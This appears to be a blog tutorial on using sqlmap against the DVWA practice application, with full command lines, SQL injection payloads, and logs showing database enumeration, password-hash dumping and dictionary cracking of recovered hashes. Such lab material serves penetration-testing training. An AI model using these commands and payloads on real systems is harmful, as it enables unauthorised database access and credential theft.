sql injection – sqlmap

MyExploit presents Rocktastic one billion, unique word combination password dictionary

https://docs.google.com/uc?id=0Bx3odaY_Hs9oaGZuTGJnMG9lUUU&export=download

sqlmap is an open source penetration testing tool that automates the process of detecting and exploiting SQL injection flaws and taking over of database servers. It comes with a powerful detection engine, many niche features for the ultimate penetration tester and a broad range of switches lasting from database fingerprinting, over data fetching from the database, to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

https://github.com/sqlmapproject/sqlmap/wiki/Usage

Typical usage

Using a webproxy such as burp enumerate the vulnerable parameter and then copy the full request into a file. Open and place a * in the vulnerable parameter. * informs sqlmap to inspect that section.

sqlmap -r request.txt 

(this will start sqlmap. It will ask you if you want to inspect the parameter with an * in it reply Y for yes, then it commonly asks you if you want to redirect reply N for no, sqlmap will then run)

If you know the SQL vendor you can force sqlmap to only test for that flavour.

sqlmap -r request.txt – -dbms=mysql

Once it confirms the parameter is vulnerable you can press ctrl + c and press e to end detection phase. It should then complete and enumerate the SQL version and OS.

Common commands after

sqlmap -r request.txt – -dbs (enumerates the db)

sqlmap -r request.txt -D database-name – -tables

sqlmap -r request.txt -D database-name -T table-name – -dump

backtrack 5r1

/pentest/database/sqlmap

To find SQL database version
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url

To Find SQL database Name
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dbs

To find database table names
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --tables -D database-name

To find database columns
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --column -T table-name -D database-name

To see the data from database
root@bt:/pentest/database/sqlmap# ./sqlmap.py -u url --dump --column -T table-name -D database-name

grab cookie from tamperdata firefox plugin

root@bt:/pentest/database/sqlmap#./sqlmap.py -u 'http://IP-Address/?id=1&Submit=Submit#' --cookie='PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low' --string="Surname" --dbs

sqlmap/1.0-dev (r4009) – automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user’s responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 17:05:51

[17:05:52] [INFO] using ‘/pentest/database/sqlmap/output/IP-Address/session’ as session file
[17:05:52] [INFO] resuming injection data from session file
[17:05:52] [INFO] resuming back-end DBMS ‘mysql 5.0′ from session file
[17:05:52] [INFO] testing connection to the target url
[17:05:52] [INFO] testing if the provided string is within the target URL page content
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:

Place: GET
Parameter: id
Type: boolean-based blind
Title: AND boolean-based blind – WHERE or HAVING clause
Payload: id=1’ AND 8761=8761 AND ‘FczA’=’FczA&Submit=Submit

Type: error-based
Title: MySQL >= 5.0 AND error-based – WHERE or HAVING clause
Payload: id=1’ AND (SELECT 45 FROM(SELECT COUNT(*),CONCAT(CHAR(58,106,118,105,58),(SELECT (CASE WHEN (45=45) THEN 1 ELSE 0 END)),CHAR(58,113,98,100,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND ‘COXA’=’COXA&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) – 1 to 10 columns
Payload: id=1’ UNION ALL SELECT NULL, CONCAT(CHAR(58,106,118,105,58),IFNULL(CAST(CHAR(117,73,80,113,73,74,111,75,85,72) AS CHAR),CHAR(32)),CHAR(58,113,98,100,58))# AND ‘kmcR’=’kmcR&Submit=Submit

Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: id=1’ AND SLEEP(5) AND ‘qxrK’=’qxrK&Submit=Submit

[17:05:52] [INFO] manual usage of GET payloads requires url encoding
[17:05:52] [INFO] the back-end DBMS is MySQL
web server operating system: Windows
web application technology: Apache 2.2.21, PHP 5.3.8
back-end DBMS: MySQL 5.0
[17:05:52] [INFO] fetching database names
[17:05:52] [INFO] read from file ‘/pentest/database/sqlmap/output/IP-Address/session’: information_schema, cdcol,  mysql, performance_schema, phpmyadmin, test, webauth
available databases [8]:
[*] cdcol
[*] information_schema
[*] mysql
[*] performance_schema
[*] phpmyadmin
[*] test
[*] webauth

[17:05:52] [INFO] Fetched data logged to text files under ‘/pentest/database/sqlmap/output/IP-Address’

./sqlmap.py -u ‘http://IP-Address/?id=1&Submit=Submit#’ –cookie=’PHPSESSID=a93ts3jmfs2ar5asvhh69k6un1; security=low’ –string=”Surname”  –users –password

dojo@dojo-vm:~/tools/sqlmap$ ./sqlmap.py -u 'http://127.0.0.1/dvwa/vulnerabilities/sqli/?id=2&Submit=Submit' --dbs --users --passwords

sqlmap/0.9-dev - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[*] starting at: 11:07:20

[11:07:20] [INFO] using '/home/dojo/tools/sqlmap/output/127.0.0.1/session' as session file
[11:07:20] [INFO] resuming string match 'Surname' from session file
you did not provide any string to match. Do you want to use the resumed string to be matched in page when the query is valid? [Y/n]
[11:07:21] [INFO] resuming injection point 'GET' from session file
[11:07:21] [INFO] resuming injection parameter 'id' from session file
[11:07:21] [INFO] resuming injection type 'stringsingle' from session file
[11:07:21] [INFO] resuming 0 number of parenthesis from session file
[11:07:21] [INFO] resuming back-end DBMS 'mysql 5' from session file
[11:07:21] [INFO] testing connection to the target url
sqlmap got a 302 redirect to ../../login.php - What target address do you want to use from now on? http://127.0.0.1:80/dvwa/vulnerabilities/sqli/ (default) or provide another target address based also on the redirection got from the application

>
[11:07:22] [INFO] testing for parenthesis on injectable parameter
[11:07:22] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[11:07:22] [INFO] fetching database users
[11:07:22] [INFO] fetching number of database users
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'localhost'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'dojo-vm'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'root'@'127.0.0.1'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[11:07:22] [INFO] fetching database users password hashes
[11:07:22] [INFO] fetching number of password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'root'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC
[11:07:22] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 1
[11:07:22] [INFO] fetching password hashes for user 'debian-sys-maint'
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *F50CAE339AF9BCEAD8D81B0D4E743C841415E925
[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

[11:07:22] [INFO] fetching database names
[11:07:22] [INFO] fetching number of databases
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': 4
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': information_schema
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': dvwa
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': mysql
[11:07:22] [INFO] read from file '/home/dojo/tools/sqlmap/output/127.0.0.1/session': w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[11:07:22] [INFO] Fetched data logged to text files under '/home/dojo/tools/sqlmap/output/127.0.0.1'

[*] shutting down at: 11:07:22

dojo@dojo-vm:~/tools/sqlmap$

————————————————————–
updates
————————————————————–
Find database

Used tamperdata firefox plugin to get Cookie as bellow

Cookie=security=low; _session_id=f4cd3cc878720ceedcc985be580901d4; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3

reload the login page so get clean url /dvwa/vulnerabilities/sqli/?id=&Submit=Submit#

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" --dbs --users --passwords

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:14:04

[10:14:04] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:14:04] [INFO] resuming injection data from session file
[10:14:04] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:14:04] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:14:04] [INFO] manual usage of GET payloads requires url encoding
[10:14:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:14:04] [INFO] fetching database users
[10:14:04] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:14:05] [INFO] fetching database users password hashes
do you want to use dictionary attack on retrieved password hashes? [Y/n/q] y
[10:14:10] [INFO] using hash method: 'mysql_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:14:16] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] n
[10:14:22] [INFO] starting dictionary attack (mysql_passwd)
[10:14:24] [WARNING] no clear password(s) found
database management system users password hashes:
[*] debian-sys-maint [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302
[*] root [1]:
password hash: *1457CHANGED263027ECC84AA1457CHANGED26302

[10:14:24] [INFO] fetching database names
[10:14:24] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[10:14:24] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:14:24

————————————————————–
Find tables

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --tables

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:27:40

[10:27:40] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:27:40] [INFO] resuming injection data from session file
[10:27:40] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:27:40] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:27:40] [INFO] manual usage of GET payloads requires url encoding
[10:27:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:27:40] [INFO] fetching tables for database: dvwa
[10:27:40] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': dvwa, guestbook, dvwa, users
Database: dvwa
[2 tables]
+-----------+
| guestbook |
| users |
+-----------+

[10:27:40] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:27:40

--------------------------------------------------------------
Find users

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa --users

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:28:45

[10:28:45] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:28:45] [INFO] resuming injection data from session file
[10:28:45] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:28:45] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:28:45] [INFO] manual usage of GET payloads requires url encoding
[10:28:45] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
[10:28:45] [INFO] fetching database users
[10:28:45] [INFO] read from file '/pentest/database/sqlmap/output/10.255.245.136/session': 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'localhost', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'dojo-vm', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'root'@'127.0.0.1', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost', 'debian-sys-maint'@'localhost'
database management system users [4]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'dojo-vm'
[*] 'root'@'localhost'

[10:28:45] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:28:45

--------------------------------------------------------------
Find passwords

root@bt:/pentest/database/sqlmap# ./sqlmap.py -u "http://10.255.245.136/dvwa/vulnerabilities/sqli/?id=&Submit=Submit#" --cookie "security=low; PHPSESSID=jpcqujj4tl04l0hfsb7c4rmrn3" -D dvwa -T users -C password --dump

sqlmap/1.0-dev (r4009) - automatic SQL injection and database takeover tool
http://sqlmap.sourceforge.net

[!] Legal Disclaimer: usage of sqlmap for attacking web servers without prior mutual consent can be considered as an illegal activity. it is the final user's responsibility to obey all applicable local, state and federal laws. authors assume no liability and are not responsible for any misuse or damage caused by this program.

[*] starting at: 10:24:19

[10:24:20] [INFO] using '/pentest/database/sqlmap/output/10.255.245.136/session' as session file
[10:24:20] [INFO] resuming injection data from session file
[10:24:20] [INFO] resuming back-end DBMS 'mysql 5.0' from session file
[10:24:20] [INFO] testing connection to the target url
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: id
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
Payload: id=%1' AND (SELECT 251 FROM(SELECT COUNT(*),CONCAT(CHAR(58,117,112,105,58),(SELECT (CASE WHEN (251=251) THEN 1 ELSE 0 END)),CHAR(58,118,116,104,58),FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'ycDo'='ycDo&Submit=Submit

Type: UNION query
Title: MySQL UNION query (NULL) - 1 to 10 columns
Payload: id=%1' UNION ALL SELECT CONCAT(CHAR(58,117,112,105,58),IFNULL(CAST(CHAR(72,70,75,104,73,81,81,83,76,117) AS CHAR),CHAR(32)),CHAR(58,118,116,104,58)), NULL# AND 'kwOP'='kwOP&Submit=Submit
---

[10:24:20] [INFO] manual usage of GET payloads requires url encoding
[10:24:20] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5.0
do you want to use LIKE operator to retrieve column names similar to the ones provided with the -C option? [Y/n] y
[10:24:22] [INFO] fetching columns LIKE 'password' for table 'users' on database 'dvwa'
[10:24:22] [INFO] fetching column(s) 'password' entries for table 'users' on database 'dvwa'
recognized possible password hash values. do you want to use dictionary attack on retrieved table items? [Y/n/q] y
[10:24:24] [INFO] using hash method: 'md5_generic_passwd'
what's the dictionary's location? [/pentest/database/sqlmap/txt/wordlist.txt]
[10:24:26] [INFO] loading dictionary from: '/pentest/database/sqlmap/txt/wordlist.txt'
do you want to use common password suffixes? (slow!) [y/N] y
[10:24:28] [INFO] starting dictionary attack (md5_generic_passwd)
[10:24:28] [INFO] found: 'abc123' for hash: 'e99a18c428cb38d5f260853678922e03'
[10:24:29] [INFO] found: 'charley' for hash: '8d3533d75ae2c3966d7e0d4fcc69216b'
[10:24:29] [INFO] found: 'letmein' for hash: '0d107d09f5bbe40cade3de5c71e9e9b7'
[10:24:30] [INFO] found: 'password' for hash: '5f4dcc3b5aa765d61d8327deb882cf99'
Database: dvwa
Table: users
[4 entries]
+---------------------------------------------+
| password |
+---------------------------------------------+
| 0d107d09f5bbe40cade3de5c71e9e9b7 (letmein) |
| 8d3533d75ae2c3966d7e0d4fcc69216b (charley) |
| e99a18c428cb38d5f260853678922e03 (abc123) |
| 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------------------------------------------+

[10:24:30] [INFO] Table 'dvwa.users' dumped to CSV file '/pentest/database/sqlmap/output/10.255.245.136/dump/dvwa/users.csv'
[10:24:30] [INFO] Fetched data logged to text files under '/pentest/database/sqlmap/output/10.255.245.136'

[*] shutting down at: 10:24:30

http://www.myexploit.wordpress.com/web-application-webscarab/

————————————————————–

/pentest/web/webscarab

root@bt:/pentest/web/webscarab# java -jar webscarab-one-20110329-1330.jar

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab1111.tmp/conversations

root@bt:/pentest/database/sqlmap# ./sqlmap.py -l /tmp/webscarab0087.tmp/conversations --users --passwords --tables --dbs --level=2 --risk=1 --scope=^IP-Address$

[02:35:19] [WARNING] no clear password(s) found
database management system users password hashes:

[*] root [1]:
password hash: *263027ECC84AA7B81EA86B0EBECAFE20BC8804FC

Note you can use online decrypter sites

MySQL4.1 uses sha1

http://www.md5decrypter.co.uk/sha1-decrypt.aspx

263027ecc84aa7b81ea86b0ebecafe20bc8804fc = dojo

[02:35:19] [INFO] fetching database names
[02:35:19] [INFO] read from file '/pentest/database/sqlmap/output/IP-Address/session': information_schema, dvwa, mysql, w3af_test
available databases [4]:
[*] dvwa
[*] information_schema
[*] mysql
[*] w3af_test

[02:35:19] [INFO] fetching tables for databases: w3af_test, dvwa, information_schema, mysql
Database: w3af_test
[2 tables]
+---------------------------------------+
| customers |
| users |
+---------------------------------------+

Database: dvwa
[2 tables]
+---------------------------------------+
| guestbook |
| users |
+---------------------------------------+

[02:35:20] [INFO] fetching columns for table 'users' on database 'dvwa'
Database: dvwa
Table: users
[6 columns]
+------------+-------------+
| Column | Type |
+------------+-------------+
| avatar | varchar(70) |
| first_name | varchar(15) |
| last_name | varchar(15) |
| password | varchar(32) |
| user | varchar(15) |
| user_id | int(6) |
+------------+-------------+

Enumeration:
These options can be used to enumerate the back-end database
management system information, structure and data contained in the
tables. Moreover you can run your own SQL statements.
-b, --banner Retrieve DBMS banner
--current-user Retrieve DBMS current user
--current-db Retrieve DBMS current database
--is-dba Detect if the DBMS current user is DBA
--users Enumerate DBMS users
--passwords Enumerate DBMS users password hashes
--privileges Enumerate DBMS users privileges
--roles Enumerate DBMS users roles
--dbs Enumerate DBMS databases
--tables Enumerate DBMS database tables
--columns Enumerate DBMS database table columns
--dump Dump DBMS database table entries
--dump-all Dump all DBMS databases tables entries
--search Search column(s), table(s) and/or database name(s)
-D DB DBMS database to enumerate
-T TBL DBMS database table to enumerate
-C COL DBMS database table column to enumerate
-U USER DBMS user to enumerate
--exclude-sysdbs Exclude DBMS system databases when enumerating tables
--start=LIMITSTART First query output entry to retrieve
--stop=LIMITSTOP Last query output entry to retrieve
--first=FIRSTCHAR First query output word character to retrieve
--last=LASTCHAR Last query output word character to retrieve
--sql-query=QUERY SQL statement to be executed
--sql-shell Prompt for an interactive SQL shell

Advertisements

6 thoughts on “sql injection – sqlmap

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s